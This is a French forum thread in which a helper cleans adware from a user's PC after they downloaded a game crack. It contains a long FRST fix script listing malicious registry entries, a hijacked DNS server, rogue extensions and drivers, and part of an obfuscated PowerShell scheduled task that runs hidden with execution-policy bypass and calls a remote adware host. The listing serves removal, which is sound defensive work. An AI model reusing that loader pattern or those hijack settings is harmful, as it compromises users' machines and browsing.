Se connecter / S'enregistrer
Votre question
Résolu

Problème de navigateur après téléchargement

Tags :
  • Internet Explorer
  • Firefox
  • Sécurité
  • Adware
Dernière réponse : dans Sécurité et virus
20 Février 2016 16:18:02

salut à tous,

Je me permets de poster un sujet sur votre forum car la je suis sans solution et je ne sais pas comment faire devant cette impasse.
Voilà je m'explique en deux mots.
Après le téléchargement d'un fichier pour ma fille, un virus s'est installé sur mon Pc. Et depuis la catastrophe. Le pc lag légèrement et je n ai plus la possibilité d utiliser mes deux navigateurs internet Internet Explorer et Mozilla.
Sur Internet Explorer lorsque je le lance plein de pub s'affiche et des logiciels se mets en installation de partout.
Pour Mozilla impossible de me mettre sur une page sa m'indique que je n'ai aucune connections.
J ai essayer de faire un scan avec Microsoft sécurity essentials. Il me trouve des logiciels malveillants et les suppriment, mais le problème est toujours la.
Si quelqu'un pourrait bien me donner la solution, sa serait super sympa.
Merci à tous

Autres pages sur : probleme navigateur telechargement

a c 940 8 Sécurité
a c 103 È Firefox
a b , Internet Explorer
20 Février 2016 17:03:32

Bonjour,

Citation :
Après le téléchargement d'un fichier pour ma fille

Quel fichier a été téléchargé et depuis quel site ?

Pour établir un rapport de diagnostic du système :

---------------------------------------------------------------------------------------------

FRST :

  • Télécharge la version FRST de Farbar, compatible avec ton système et enregistre le fichier sur ton Bureau <-- Important

    Pour un système en 32 bits -> FRST
    Pour un système en 64 bits -> FRST64
    Comment savoir quelle version 32 bits ou 64 bits est exécutée sur mon système ?

    Patiente le temps que ton navigateur te propose le téléchargement à enregistrer, sans cliquer nulle part, surtout pas sur les sponsors de la page.
    Rappel : FRST doit être enregistré sur ton Bureau <-- Important

  • Ferme toutes les applications, y compris ton navigateur
  • Double-clique sur FRST.exe et clique sur Oui pour accepter le Disclaimer
    /!\ Sous Vista, Windows 7 et 8, il faut lancer le fichier par clic-droit -> Exécuter en tant qu'administrateur
  • Sur le menu principal, clique sur Analyser et patiente le temps de l'analyse

  • Accepte le redémarrage du système si demandé
  • A la fin du scan, les rapports FRST.txt et Addition.txt sont créés. Poste ces rapports dans ta prochaine réponse.
    Les rapports sont enregistrés au même emplacement que l'outil et sous C:\FRST\Logs


  • Sous Internet Explorer et Edge, le filtre SmartScreen peut déclencher une alerte. Cliquer sur Actions ou Informations complémentaires puis sur Exécuter quand même

    ---------------------------------------------------------------------------------------------

    Sont attendus les rapports FRST.txt et Addition.txt

    Tous les rapports doivent être hébergés sur ce site d'hébergement de fichiers et tu indiques les liens obtenus dans ta réponse -> Aide à l'utilisation

    @+
    m
    0
    l
    21 Février 2016 00:05:24

    Re Bonsoir,

    Déjà dans un premier temps merci pour votre réponse c vraiment sympa de prendre le temps pour m'aider à régler ce problème.

    Donc le fichier en question que j'ai téléchargé c'étais un crack no cd pour un jeu Disney. Mais le site je m'en souviens plus.

    J 'ai fait se que vous m'avez demandé avec le logiciel FRST64. Voila ci-joint les deux rapports demandés.
    Voici les liens:
    Addition.txt: http://up.security-x.fr/file.php?h=Rde7185021b9502da2dd...
    FRST.txt: http://up.security-x.fr/file.php?h=Rad9c52010d34ce24d18...

    Merci pour tous par avance

    A bientôt
    m
    0
    l
    Contenus similaires
    a c 940 8 Sécurité
    a c 103 È Firefox
    a b , Internet Explorer
    21 Février 2016 09:45:26

    Bonjour,

    Citation :
    c'étais un crack no cd pour un jeu Disney

    Il ne faut pas s'étonner après !

    Les cracks et keygens sont des vecteurs de malwares et d'infections, à éviter !
    Le danger des cracks !

    .... et pour le coup, le système est bien chargé, des infections coriaces, c'est à se demander comment ce Windows arrive encore à fonctionner !

    .... jusqu'au jour où l'exécution du crack déclenchera l'action d'une infection encore plus grave, avec perte de données personnelles et vol d'informations.

    Supprime tout crack enregistré sur ton système.


    Tu appliques les procédures dans l'ordre où elles sont présentées.

    /!\Les outils ne doivent être lancés qu'une seule fois afin de ne pas fausser les rapports demandés./!\

    --------------------------------------------------------------------------------------------------------------

    FRST - Correctif :

    • Ouvre le Bloc-notes (Démarrer => Tous les programmes => Accessoires => Bloc-notes)
    • Copie/colle la totalité du contenu de la zone Code ci-dessous dans le Bloc-notes

      start
      CreateRestorePoint:
      CloseProcesses:
      HKLM-x32\...\Run: [mbot_fr_163] => [X]
      HKLM-x32\...\Run: [oasi_en_062020224] => [X]
      HKLM-x32\...\Run: [rec_en_77] => [X]
      HKLM-x32\...\Run: [sun3] => [X]
      AppInit_DLLs-x32: C:\ProgramData\caMyciloP\Lotlamfresh.dll => C:\ProgramData\caMyciloP\Lotlamfresh.dll [257536 2016-01-31] ()
      ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => Pas de fichier
      GroupPolicy: Restriction - Chrome
      CHR HKLM\SOFTWARE\Policies\Google: Restriction
      Tcpip\..\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}: [NameServer] 104.197.191.4
      HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.sweet-page.com/web/?type=ds&ts=1431619519&z=bfa0ba17bd353e95ee9801dgez4c8g8q8gct8wce2t&from=corfr&uid=CrucialXCT120M500SSD1_13140933434E0933434E&q={searchTerms}
      HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.sweet-page.com/web/?type=ds&ts=1431619519&z=bfa0ba17bd353e95ee9801dgez4c8g8q8gct8wce2t&from=corfr&uid=CrucialXCT120M500SSD1_13140933434E0933434E&q={searchTerms}
      HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.sweet-page.com/web/?type=ds&ts=1431619519&z=bfa0ba17bd353e95ee9801dgez4c8g8q8gct8wce2t&from=corfr&uid=CrucialXCT120M500SSD1_13140933434E0933434E&q={searchTerms}
      HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.sweet-page.com/web/?type=ds&ts=1431619519&z=bfa0ba17bd353e95ee9801dgez4c8g8q8gct8wce2t&from=corfr&uid=CrucialXCT120M500SSD1_13140933434E0933434E&q={searchTerms}
      HKU\S-1-5-21-3611895705-2825658656-1871142997-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRYEqQao2TxTGptbOxpBNbMQc-Bz0zMmgmr5inyhA7tzxvYkPkhhKDzNlS6I2DRv6Ehlz85-4kKiSDkuBdELXYSvu2Ob1asQZyAmgMsszc444D9cer9NzESw2KUlysHe_ymJRffzpK3fNYD38kbzPtuVuaPO8ncGIUSCfE1UDgn9RqRpNLBahUBwCl3KmP5U,&q={searchTerms}
      SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL =
      SearchScopes: HKLM-x32 -> ielnksrch URL = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRYEqQao2TxTGptbOxpBNbMQc-Bz0zMmgmr5inyhA7tzxvYkPkhhKDzNlS6I2DRv6Ehlz85-4kKiSDkuBdELXYSvu2Ob1asQZyAmgMsszc444D9cer9NzESw2KUlysHe_ymJRffzpK3fNYD38kbzPtuVuaPO8ncGIUSCfE1UDgn9RqRpNLBahUBwCl3KmP5U,&q={searchTerms}
      BHO-x32: Pas de nom -> {02478D38-C3F9-4efb-9B51-7695ECA05670} -> Pas de fichier
      FF NewTab: C:\\ProgramData\\caMyciloPs\\ff.NT
      FF DefaultSearchEngine: findit
      FF Homepage: C:\\ProgramData\\caMyciloPs\\ff.HP
      FF user.js: detected! => C:\Users\S\AppData\Roaming\Mozilla\Firefox\Profiles\prrb21uk.default\user.js [2016-01-31]
      FF SearchPlugin: C:\Users\S\AppData\Roaming\Mozilla\Firefox\Profiles\prrb21uk.default\searchplugins\bing-lavasoft.xml [2016-01-31]
      FF SearchPlugin: C:\Users\S\AppData\Roaming\Mozilla\Firefox\Profiles\prrb21uk.default\searchplugins\bingcom.xml [2016-01-31]
      FF SearchPlugin: C:\Users\S\AppData\Roaming\Mozilla\Firefox\Profiles\prrb21uk.default\searchplugins\findit.xml [2016-01-31]
      FF Extension: duplicatethistabmozillaorg - C:\Users\S\AppData\Roaming\Mozilla\Firefox\Profiles\prrb21uk.default\Extensions\duplicate-this-tab@mozilla.org [2014-10-17] [non signé]
      FF Extension: Browsers+Apps+1.1 - C:\Users\S\AppData\Roaming\Mozilla\Firefox\Profiles\prrb21uk.default\Extensions\wrigtdamon@yahoo.com [2014-10-14] [non signé]
      FF HKLM\...\Firefox\Extensions: [{552214C7-0E89-4D62-99BF-692DF251F6CE}] - C:\Program Files\shopperz310120161627\Firefox\{552214C7-0E89-4D62-99BF-692DF251F6CE}.xpi => non trouvé(e)
      FF HKLM\...\Firefox\Extensions: [{794D2E20-F319-4F6D-83F3-7A6899A0A3EE}] - C:\Program Files\shopperz310120161636\Firefox\{794D2E20-F319-4F6D-83F3-7A6899A0A3EE}.xpi => non trouvé(e)
      FF HKLM\...\Firefox\Extensions: [{23BB450D-DE1A-48A0-b2F1-BF297E6FFEE9}] - C:\Program Files\shopperz310120161915\Firefox\{23BB450D-DE1A-48A0-b2F1-BF297E6FFEE9}.xpi => non trouvé(e)
      FF HKLM-x32\...\Firefox\Extensions: [{552214C7-0E89-4D62-99BF-692DF251F6CE}] - C:\Program Files\shopperz310120161627\Firefox\{552214C7-0E89-4D62-99BF-692DF251F6CE}.xpi => non trouvé(e)
      FF HKLM-x32\...\Firefox\Extensions: [{794D2E20-F319-4F6D-83F3-7A6899A0A3EE}] - C:\Program Files\shopperz310120161636\Firefox\{794D2E20-F319-4F6D-83F3-7A6899A0A3EE}.xpi => non trouvé(e)
      FF HKLM-x32\...\Firefox\Extensions: [{23BB450D-DE1A-48A0-b2F1-BF297E6FFEE9}] - C:\Program Files\shopperz310120161915\Firefox\{23BB450D-DE1A-48A0-b2F1-BF297E6FFEE9}.xpi => non trouvé(e)
      CHR Extension: (Google Slides) - C:\Users\S\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-02-10] [UpdateUrl: hxxps://epicunitscan.info/00service/update2/crx]
      CHR Extension: (Google Docs) - C:\Users\S\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-02-10] [UpdateUrl: hxxps://epicunitscan.info/00service/update2/crx]
      CHR Extension: (Google Drive) - C:\Users\S\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-02-10] [UpdateUrl: hxxps://epicunitscan.info/00service/update2/crx]
      CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\S\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2015-02-11] [UpdateUrl: hxxps://epicunitscan.info/00service/update2/crx]
      CHR Extension: (Web Browser Switcher for Chrome) - C:\Users\S\AppData\Local\Google\Chrome\User Data\Default\Extensions\dfjohdhhdfnbnleaagegogfdfgkbfgcg [2015-03-02] [UpdateUrl: hxxps://epicunitscan.info/00service/update2/crx]
      CHR Extension: (Google Sheets) - C:\Users\S\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-02-10] [UpdateUrl: hxxps://epicunitscan.info/00service/update2/crx]
      CHR Extension: (Google Wallet) - C:\Users\S\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-02-10] [UpdateUrl: hxxps://epicunitscan.info/00service/update2/crx]
      CHR HKLM\...\Chrome\Extension: [fcgnigmofekcllgbiejhmigggmgehkip] - hxxps://clients2.google.com/service/update2/crx
      CHR HKU\S-1-5-21-3611895705-2825658656-1871142997-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [jlcgehabolcakkjhgmgpkagpolbjlhfa] - hxxps://clients2.google.com/service/update2/crx
      CHR HKLM-x32\...\Chrome\Extension: [fcgnigmofekcllgbiejhmigggmgehkip] - hxxps://clients2.google.com/service/update2/crx
      S2 pKmAVFr; C:\ProgramData\QpHsgPX\pKmAVFr.exe [3002352 2016-01-31] (Rational Thought Solutions)
      S2 WajaNetEn Monitor; C:\Program Files\WajaNetEn\b6ace0ad34426af9bfa677bd74982d41.exe [3068928 2016-01-20] () [Fichier non signé]
      R1 cherimoya; C:\Windows\System32\drivers\cherimoya.sys [61336 2016-01-31] (Cherimoya Ltd)
      R1 {28732d35-3deb-4a02-82b2-301e83b4aecb}Gw64; C:\Windows\System32\drivers\{28732d35-3deb-4a02-82b2-301e83b4aecb}Gw64.sys [48744 2016-01-31] (StdLib)
      S3 SMUpdd; \??\C:\Program Files\Common Files\Goobzo\GBUpdate\smw.sys [X]
      S1 tbfd_1_10_0_16; system32\drivers\tbfd_1_10_0_16.sys [X]
      2016-02-12 18:41 - 2016-02-01 08:34 - 00260919 ____N (zcengine) C:\Windows\SysWOW64\trz6EE9.tmp
      2016-02-02 16:32 - 2016-02-01 08:34 - 00308935 ____N (zcengine) C:\Windows\system32\trz3C0.tmp
      2016-02-02 16:18 - 2016-02-02 16:18 - 00000000 ____D C:\Program Files\Common Files\AV
      2016-02-02 16:17 - 2016-02-17 11:11 - 00000000 ____D C:\ProgramData\AVAST Software
      2016-02-02 13:28 - 2016-02-02 13:28 - 00022504 _____ C:\Windows\System32\Tasks\{7F7E7A47-0B0C-0F08-0A11-790D7F0A1178}
      2016-02-02 13:28 - 2016-02-02 13:28 - 00000000 ____D C:\ProgramData\8b3e0aeb-25d7-1
      2016-02-02 13:28 - 2016-02-02 13:28 - 00000000 ____D C:\ProgramData\8b3e0aeb-00e7-0
      2016-02-01 08:44 - 2016-02-01 08:44 - 00000000 ____D C:\ZombieNews
      2016-02-01 08:44 - 2016-02-01 08:44 - 00000000 ____D C:\Users\S\AppData\Local\HealthAlert
      2016-02-01 08:39 - 2016-02-13 19:17 - 00000000 ____D C:\ProgramData\Browser
      2016-02-01 08:35 - 2016-02-01 08:47 - 00009656 _____ C:\Windows\SysWOW64\zcengineOff.ini
      2016-02-01 08:35 - 2016-02-01 08:47 - 00009656 _____ C:\Windows\system32\zcengineOff.ini
      2016-01-31 20:00 - 2016-01-31 20:00 - 00003106 _____ C:\Windows\System32\Tasks\{1F4A89EC-573E-4BEA-8104-7FC6597AC0DB}
      2016-01-31 19:58 - 2016-01-31 19:58 - 00000000 ____D C:\Program Files (x86)\Exploremedia
      2016-01-31 19:57 - 2016-02-15 22:28 - 00000000 ____D C:\ProgramData\caMyciloP
      2016-01-31 19:57 - 2016-01-31 19:57 - 00000000 ____D C:\ProgramData\caMyciloPs
      2016-01-31 19:51 - 2016-01-31 19:57 - 00000000 ____D C:\Users\S\AppData\Roaming\systweak
      2016-01-31 19:51 - 2015-11-20 19:27 - 00019888 _____ () C:\Windows\system32\roboot64.exe
      2016-01-31 19:50 - 2016-01-31 19:58 - 00000000 ____D C:\Users\S\AppData\Roaming\Opera Software
      2016-01-31 19:50 - 2016-01-31 19:58 - 00000000 ____D C:\Users\S\AppData\Local\Opera Software
      2016-01-31 19:50 - 2016-01-31 19:58 - 00000000 ____D C:\Program Files (x86)\Opera
      2016-01-31 19:50 - 2016-01-31 19:50 - 00000000 ____D C:\ProgramData\QpHsgPX
      2016-01-31 19:49 - 2016-01-31 19:49 - 00000000 ____D C:\ProgramData\PlayGemConfig
      2016-01-31 19:48 - 2016-02-03 18:34 - 00000000 ____D C:\Program Files (x86)\QuickSearch
      2016-01-31 19:42 - 2016-01-31 19:42 - 00000000 ____D C:\Users\S\AppData\Local\ZombieNews
      2016-01-31 18:30 - 2016-01-31 18:30 - 00425744 _____ (Lavasoft Limited) C:\Windows\system32\LavasoftTcpService64.dll
      2016-01-31 18:30 - 2016-01-31 18:30 - 00345360 _____ (Lavasoft Limited) C:\Windows\SysWOW64\LavasoftTcpService.dll
      2016-01-31 18:30 - 2016-01-31 18:30 - 00002768 _____ C:\Windows\SysWOW64\LavasoftTcpServiceOff.ini
      2016-01-31 18:30 - 2016-01-31 18:30 - 00002768 _____ C:\Windows\system32\LavasoftTcpServiceOff.ini
      2016-01-31 18:30 - 2016-01-31 18:30 - 00000250 _____ C:\Prefs.js
      2016-01-31 18:30 - 2016-01-31 18:30 - 00000000 ____D C:\searchplugins
      2016-01-31 18:24 - 2016-02-01 08:36 - 00000002 _____ C:\END
      2016-01-31 18:18 - 2016-01-31 19:54 - 00061336 _____ (Cherimoya Ltd) C:\Windows\system32\Drivers\cherimoya.sys
      2016-01-31 18:15 - 2016-01-31 18:16 - 00000000 ____D C:\Program Files\WajaNetEn
      2016-01-31 17:46 - 2016-02-02 22:00 - 00000000 ____D C:\Users\S\AppData\Roaming\TutofQesgifo
      2016-01-31 17:46 - 2016-01-31 17:47 - 00000000 ____D C:\Users\S\AppData\Local\Tempfolder
      2016-01-31 17:46 - 2016-01-31 17:46 - 00003330 _____ C:\Windows\System32\Tasks\Thufihaz
      2016-01-31 17:46 - 2016-01-31 17:46 - 00000000 ____D C:\Windows\system32\enet
      2016-01-31 17:21 - 2016-01-31 17:21 - 00000000 ____D C:\ProgramData\Rlusuafoosha
      2016-01-31 17:17 - 2016-02-02 22:00 - 00000000 ____D C:\Program Files (x86)\5CAFBB60-1454257034-11DD-BEB1-BCEE7B86F8D3
      2016-01-31 17:12 - 2016-01-31 07:38 - 00048744 _____ (StdLib) C:\Windows\system32\Drivers\{28732d35-3deb-4a02-82b2-301e83b4aecb}Gw64.sys
      2016-01-31 17:10 - 2016-01-31 19:58 - 00001445 _____ C:\Users\S\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
      2016-01-31 17:08 - 2016-01-31 17:08 - 00003184 _____ C:\Windows\System32\Tasks\{C8C5A7B0-140E-4DB7-AE8F-8DAA32E87B74}
      2016-01-31 16:59 - 2016-02-02 22:00 - 00000000 ____D C:\Program Files\shopperz310120161627
      2016-01-31 16:59 - 2016-01-31 17:06 - 00000000 ____D C:\Users\S\AppData\Local\SearchModule
      2016-01-31 16:59 - 2016-01-31 16:59 - 00023208 _____ (Corporation) C:\Windows\system32\Drivers\sdfhgdf.sys
      2016-01-31 16:59 - 2016-01-31 16:59 - 00003438 _____ C:\Windows\System32\Tasks\SMWUpd
      2016-01-31 16:59 - 2016-01-31 16:59 - 00003332 _____ C:\Windows\System32\Tasks\Tofze
      2016-01-31 16:59 - 2016-01-31 16:59 - 00000000 ____D C:\Users\S\AppData\LocalLow\Company
      2016-01-31 16:59 - 2016-01-31 16:59 - 00000000 ____D C:\Users\S\AppData\LocalLow\{D2020D47-707D-4E26-B4D9-739C4F4C2E9A}
      2016-01-31 16:59 - 2016-01-31 16:59 - 00000000 ____D C:\uninst
      2016-01-31 16:59 - 2016-01-31 16:59 - 00000000 ____D C:\ProgramData\SearchModule
      2016-01-31 16:58 - 2016-02-02 22:00 - 00000000 ____D C:\Users\S\AppData\Local\5CAFBB60-1454259509-11DD-BEB1-BCEE7B86F8D3
      2016-01-31 16:57 - 2016-02-12 18:43 - 00000000 ____D C:\Program Files (x86)\5CAFBB60-1454255842-11DD-BEB1-BCEE7B86F8D3
      2016-01-31 16:57 - 2016-01-31 18:32 - 00000000 ____D C:\Users\S\AppData\Roaming\WTools
      2016-01-31 16:57 - 2016-01-31 18:32 - 00000000 ____D C:\Users\S\AppData\Roaming\Store
      2016-01-31 16:57 - 2016-01-31 16:56 - 00001110 _____ C:\Windows\system32\Drivers\etc\hp.bak
      2016-01-31 16:56 - 2016-02-02 22:00 - 00000000 ____D C:\ProgramData\aGKpCJK
      2016-01-31 16:56 - 2016-02-02 16:20 - 00000000 ____D C:\ProgramData\ApplicationHosting
      2016-01-31 16:56 - 2016-02-02 16:20 - 00000000 ____D C:\Program Files\BitTorrent
      2016-01-31 16:56 - 2016-01-31 20:06 - 00000000 ____D C:\ProgramData\Boxore
      2016-01-31 16:56 - 2016-01-31 19:58 - 00010088 _____ C:\Windows\SysWOW64\BoxoreServiceOff.ini
      2016-01-31 16:56 - 2016-01-31 19:58 - 00010088 _____ C:\Windows\system32\BoxoreServiceOff.ini
      2016-01-31 16:56 - 2016-01-31 19:57 - 00002397 _____ C:\Windows\SysWOW64\findit.xml
      2016-01-31 16:56 - 2016-01-31 18:31 - 00000000 ____D C:\Users\S\AppData\Roaming\Nosibay
      2016-01-31 16:56 - 2016-01-31 16:58 - 00000000 ____D C:\Users\S\AppData\Local\Boxore
      2016-01-31 16:56 - 2016-01-31 16:56 - 00041472 _____ C:\Users\S\AppData\Local\Villalab.dat
      2016-01-31 16:56 - 2016-01-31 16:56 - 00000187 _____ C:\Users\S\AppData\Local\Villalab.exe.config
      2016-01-31 16:56 - 2016-01-31 16:56 - 00000000 ____D C:\ProgramData\Medlights
      2016-01-31 16:56 - 2016-01-19 03:22 - 00303984 _____ (Boxore OU) C:\Windows\SysWOW64\BoxoreService.dll
      2016-01-31 16:55 - 2016-02-18 11:25 - 00000000 ____D C:\Program Files\Sound+
      2016-01-31 16:56 - 2016-01-31 16:57 - 0001263 _____ () C:\Users\S\AppData\Roaming\Bubble Dock.boostrap.log
      2016-01-31 16:56 - 2016-01-31 16:57 - 0005688 _____ () C:\Users\S\AppData\Roaming\Bubble Dock.installation.log
      2016-01-31 16:57 - 2016-01-31 16:57 - 0000078 _____ () C:\Users\S\AppData\Roaming\Selection Tools.installation.log
      2016-01-31 16:56 - 2016-01-31 16:56 - 0000097 _____ () C:\Users\S\AppData\Roaming\WindApp.boostrap.log
      2016-01-31 16:57 - 2016-01-31 16:57 - 0000078 _____ () C:\Users\S\AppData\Roaming\WindApp.installation.log
      C:\Program Files\Common Files\Goobzo
      C:\Program Files\shopperz310120161636
      C:\Program Files\shopperz310120161915
      C:\Users\S\AppData\Roaming\mystartsearch
      C:\Users\S\AppData\Roaming\omiga-plus
      Task: {038ECAE5-4F59-4163-B023-594620E942DF} - System32\Tasks\Tofze => C:\PROGRA~1\SHOPPE~1\Degmueq.bat
      Task: {0EEA080F-5E45-41D8-B3D3-AFF16F13795F} - System32\Tasks\{7F7E7A47-0B0C-0F08-0A11-790D7F0A1178} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand $ E r r o r A c t i o n P r e f e r e n c e = " s t o p " ; $ s c = " S i l e n t l y C o n t i n u e " ; $ W a r n i n g P r e f e r e n c e = $ s c ; $ P r o g r e s s P r e f e r e n c e = $ s c ; $ V e r b o s e P r e f e r e n c e = $ s c ; $ D e b u g P r e f e r e n c e = $ s c ; 
 f u n c t i o n   s r ( $ p ) { $ n = " W i n d o w P o s i t i o n " ; t r y { N e w - I t e m   - P a t h   $ p | O u t - N u l l ; } c a t c h { } t r y { N e w - I t e m P r o p e r t y   - P a t h   $ p   - N a m e   $ n   - P r o p e r t y T y p e   D W O R D   - V a l u e   2 0 1 3 2 9 6 6 4 | O u t - N u l l ; } 
 c a t c h { t r y { S e t - I t e m P r o p e r t y   - P a t h   $ p   - N a m e   $ n   - V a l u e   2 0 1 3 2 9 6 6 4 | O u t - N u l l ; } c a t c h { } } } s r ( " H K C U : \ C o n s o l e \ % S y s t e m R o o t % _ S y s t e m 3 2 _ W i n d o w s P o w e r S h e l l _ v 1 . 0 _ p o w e r s h e l l . e x e " ) ; s r ( " H K C U : \ C o n s o l e \ % S y s t e m R o o t % _ S y s t e m 3 2 _ s v c h o s t . e x e " ) ; s r ( " H K C U : \ C o n s o l e \ t a s k e n g . e x e " ) ; 
 $ s u r l = " h t t p : / / s o f t p i c k s m a r t . c o m / u / ? a = e x q L - D E U t F v H M Q c 2 d d u - J v b A T O N Z _ j _ S D C 5 Z 9 S w 3 A B H T 4 Q 7 K F N 4 I c X 4 W k 3 z L m g s D T B D Y A z - w W X x E 2 y 3 r w i 8 P L 3 G 0 4 I a z 4 2 x E Z I V q F G N 2 q v _ o R 5 S D Q X F D u v i 8 p M b a l w 2 H c Z F b _ U H q l T F k O w m A I _ g n k l p Z B H l H _ d t R g 7 s D Q Y a m b G q l a 5 E E c Y n x F N q 8 M b G 8 L h 0 d f 5 2 O _ E B 8 M m 5 W H I a 1 x j c Z n d m d v u g s a I O 2 m f u y m A u X - m w 8 7 Q - S r W 3 2 p W A G F b l Z m N I u V 7 T T t N K K Z b N o h o N R C F F 2 D A 6 9 w V N Q a Y w _ c t 4 j k U b l r R q N N c f f H K - w d i P _ f p l y g g u K U d x h 3 7 c Z 7 U O K Z - j f d Y x u 9 n 3 y d m r r e Z 5 3 1 H J n j E z K s E d B Q V 6 M e 1 C c Y r w u e 0 6 n f L G N E Z 1 r Y 0 k J J A A s Z O 2 i h G x f Q 2 I P M O s C B d a L c c A r P y Y h W E Y B l n B B Q - 6 w 3 s Y y Q 5 L P t 6 4 P m E c D W y i 6 W j D L i j y O f F G Z s k _ y X 9 r v g l _ B P s X m A 8 a 6 9 h k x s e s o 3 z 9 3 B J s d r p z G 5 K H z D i d Y T V Z M u x e h 2 0 4 t X w l O A E M H c R 0 x 4 - N v t G Q M p p 9 m W d t N y j h g V d a F T e u 3 G m x j z 8 _ b N 7 C N E - _ R C p F 9 3 R 7 A V 9 z I 1 h T j i E H i W x M B 2 q 5 7 x Y Z L x K j k P u w o X _ C 1 8 4 U D t t 6 b g y z Y e R A 0 X h e P c X w c Y A q y n q f s f - 5 f W X z p U 9 W 5 K 1 - - E - k Y c a V o s D C b Z q k V X - z y d v j 4 V v 0 I E Z 0 9 5 D Q W y N Z R B k c 5 I J j 4 g G V J h k q r c A p o C c N m p y B r U 8 0 n r u 5 y g W X 1 j B E C O r z h S L a 3 S w j x 8 B n j Y F B j A C 5 n E f H J X 7 l a B Q f 8 N B O Z u k k A J p z c K X n J - A g f H z B C i V q 9 I p E G o j C & c = g h 7 S M I w I L e 2 m g N d 4 X 3 D T 1 R C a i o M H K G W 8 M U 0 F a c N Q N 2 v e a f l L v z 2 6 W Q v 3 V 0 y 1 _ K Z 6 - H W A 2 E n 4 q S L c R z 0 b L 2 V w 4 0 q E Z k q R 9 N I m 5 w 9 e k E m s y L C q K O t v Z u x l 0 D D Y X s z S V a c z B 8 e Z f _ V K - k C D e t 2 Z J l L o 8 4 9 k q R s W u i p I t Z J J q g 0 w k J p y 1 l o o 3 6 7 _ h V t J W e O M l w m A a v u o 6 E p S k Y y r N G I b n D F R 5 G D t y 4 R t O R U 2 8 D J l K 0 O r q f _ s 3 n r M W R 7 Y C w F B l 5 M _ 0 x 4 g K O O E Q Z H 0 Q 8 E a T m m 3 Z o r R P g c V d V N L K l j 5 8 J Q G 6 q U L x u y H T W T h M K k h P _ 7 l q T V n S i 8 2 4 a J d m V Q l L F 6 B c F i F p i 6 y k m m h F S c I r f V g s N 4 Y 9 d U d m P f y y T 7 n 9 1 6 W K 0 Y 4 1 g m H I K U x N 1 V d D C Z t y s s C 6 a G L Y l A f R I o _ H B 3 j X 4 z g o c a W d i 3 p S 8 - Q Z J 4 w n g Y 0 9 m L l 9 4 K d q d d D U u W v R N B V w e _ G Q p F J - x U 2 w X 0 d B B T J 4 y Q 5 v P t Q k Y F i D x j V 4 P V x e P Q j W 5 T o s n g I 1 V n y h 7 Z t - V k J x e 3 4 m K d t m 8 E - X V N 9 W N N v 9 j B S C n c r I g r c t X k B r s H Y n Z R e 7 f R 1 B W m f u o b - j x o B m p Q F N F S r Z T Q a x P L d 0 0 - 4 j x s C d y d 4 s q A j p 6 2 L S k H A D C t J v Y _ Y 8 H M Y x C d k I a W 4 K 2 x V 9 y v n T 9 N N 2 j X i k 1 I l I U u D N 7 M n a i 9 Q - S F B - s - G b t e K 0 z E n 4 d 8 I z g P v s n 3 8 x j a t c m v z x O D 2 J c k 6 c 4 L a 0 w n 5 o r w o s d R k P r G M L 5 8 4 C v o p z 0 q H s q R s b R W i s C g u B b I z T 9 o v R A Z F j g _ R 4 1 q A T v V n 0 U q p S _ d 8 5 z v G g y r u d b R m H b z J z i _ w F S U 2 f B r t v U v 2 r p v u Q j K w I m f J m 6 _ X f L Q e Z p X H D B - 9 w d c 4 j 3 m 0 c - G T q q u A i b 0 o 5 G K o d W 6 & r = 1 6 1 0 2 6 3 3 9 0 0 6 3 6 2 2 9 7 2 " ; $ s t s k = " { 7 F 7 E 7 A 4 7 - 0 B 0 C - 0 F 0 8 - 0 A 1 1 - 7 9 0 D 7 F 0 A 1 1 7 8 } " ; $ p r i d = " D N S U n l o c k e r " ; $ i n i d = " G V L P L M U I " ; t r y { i f ( $ P S V e r s i o n T a b l e . P S V e r s i o n . M a j o r   - l t   2 ) { b r e a k ; } $ v = [ S y s t e m . E n v i r o n m e n t ] : : O S V e r s i o n . V e r s i o n ; 
 i f ( $ v . M a j o r   - e q   5 ) { i f ( ( $ v . M i n o r   - l t   2 )   - A N D   ( ( G e t - W m i O b j e c t   W i n 3 2 _ O p e r a t i n g S y s t e m ) . S e r v i c e P a c k M a j o r V e r s i o n   - l t   2 ) ) { b r e a k ; } } 
 i f ( - N O T   ( [ S e c u r i t y . P r i n c i p a l . W i n d o w s P r i n c i p a l ] [ S e c u r i t y . P r i n c i p a l . W i n d o w s I d e n t i t y ] : : G e t C u r r e n t ( ) ) . I s I n R o l e ( [ S e c u r i t y . P r i n c i p a l . W i n d o w s B u i l t I n R o l e ]   " A d m i n i s t r a t o r " ) ) { b r e a k ; } 
